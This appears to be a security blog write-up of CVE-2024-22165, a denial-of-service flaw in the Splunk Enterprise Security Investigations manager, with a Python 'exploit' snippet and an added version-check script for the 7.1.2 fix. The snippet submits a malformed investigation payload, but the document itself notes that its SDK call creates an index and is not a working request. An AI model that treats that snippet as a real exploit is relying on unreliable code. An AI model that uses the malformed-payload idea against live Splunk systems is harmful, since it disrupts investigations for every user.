In this post, we will discuss a vulnerability in Splunk Enterprise Security (ES) tracked as CVE-2024-22165. This vulnerability can lead to a Denial of Service (DoS) condition, rendering the Investigations manager unusable for all users. This issue was found in Splunk ES versions lower than 7.1.2. We will look into the details of the vulnerability, share a code snippet to demonstrate the exploit, and provide links to relevant resources for further reference.

Exploit Details

This vulnerability can be exploited by an attacker with an authenticated session and permission to create an Investigation. The attacker can craft a malformed investigation that, when saved, prevents the generation and rendering of the Investigations manager. This makes the Investigations manager inaccessible to all users, disrupting normal operations and leading to a denial of service.

To better demonstrate the exploit, consider the following code snippet example:

import splunklib.client as client

# Define connection parameters and connect to the Splunk management port.
# splunklib converts the port with int(), so it must be numeric, not a placeholder string.
splunk_connection = client.connect(
    host="SPLUNK_HOST",
    port=8089,  # default Splunk management port; replace with your own
    username="USERNAME",
    password="PASSWORD"
)

# Create a malformed investigation: the owner is empty and 'malformed_field'
# is not part of a valid investigation.
malformed_investigation = {
    'name': 'DoS attack',
    'description': 'This is an example of a DoS attack',
    'owner': '',
    'malformed_field': 'denial_of_service'
}

# Save the malformed investigation to Splunk Enterprise Security.
# Note: indexes.create() in the Splunk SDK creates an index named 'DoS attack'
# with the remaining keys passed as extra parameters; it does not call the
# ES investigation endpoint, which this post does not document. The call is
# kept here as the author's illustration of submitting the malformed payload.
splunk_connection.indexes.create(**malformed_investigation)

In this example, we connect to a Splunk instance and create a malformed investigation containing a field 'malformed_field' that should not be present in a valid investigation (the 'owner' field is also left empty). Saving this malformed investigation causes the Investigations manager to stop generating and rendering, leading to the DoS condition. Note that the snippet's `indexes.create()` call belongs to the Splunk SDK's index API rather than the ES investigation API; the post does not specify the actual investigation endpoint, so treat the snippet as an illustration of the malformed payload rather than a working request.

Affected Versions

Only Splunk Enterprise Security (ES) versions lower than 7.1.2 are affected by this vulnerability. If you are running a version below 7.1.2, it is highly recommended to update your Splunk ES to 7.1.2 or the latest available version to avoid this issue.
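Because the affected range is defined purely by version number, an inventory script can flag vulnerable instances without touching the application. The following added example (not part of the post) compares a reported Splunk ES version string against the 7.1.2 fix version from the advisory. It handles versions with fewer than three components and strips any build suffix; how you obtain the version string from each instance is left to your own tooling.

```python
"""Flag Splunk ES version strings that fall in the affected range (< 7.1.2)."""
import re
from typing import Tuple

FIXED_VERSION = "7.1.2"  # first fixed release, as stated in the advisory


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse a dotted numeric version, ignoring a build suffix after '-', '+' or whitespace."""
    core = re.split(r"[-+\s]", version.strip(), maxsplit=1)[0]
    parts = core.split(".")
    if not parts or not all(part.isdigit() for part in parts):
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in parts)


def is_affected(version: str, fixed: str = FIXED_VERSION) -> bool:
    """Return True when `version` is strictly lower than the fixed version."""
    current, target = parse_version(version), parse_version(fixed)
    # Pad the shorter tuple with zeros so '7.1' compares as '7.1.0'.
    width = max(len(current), len(target))
    current += (0,) * (width - len(current))
    target += (0,) * (width - len(target))
    return current < target


if __name__ == "__main__":
    # Constructed inventory of hostnames and reported versions.
    inventory = {
        "es-prod-01": "7.0.2",
        "es-prod-02": "7.1.2",
        "es-dev-01": "7.1.1-build42",
        "es-lab-01": "7.2",
    }
    for host, version in inventory.items():
        status = "AFFECTED" if is_affected(version) else "ok"
        print(f"{host:12} {version:14} {status}")
```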

For further details on this vulnerability, you can refer to the following resources:

- Splunk Release Notes - Lists fixed issues in Splunk ES 7.1.2, including this vulnerability.
- CVE-2024-22165 - The official entry in the CVE database for this vulnerability.

Conclusion

CVE-2024-22165 is a significant vulnerability that can lead to a denial of service attack on the Investigations manager in Splunk Enterprise Security versions lower than 7.1.2. An attacker with an authenticated session and the ability to create an Investigation can create a malformed investigation to exploit this issue. It is recommended to update your Splunk ES to the latest version to avoid being affected by this vulnerability.

Timeline

Published on: 01/09/2024 17:15:12 UTC
Last modified on: 01/16/2024 18:30:58 UTC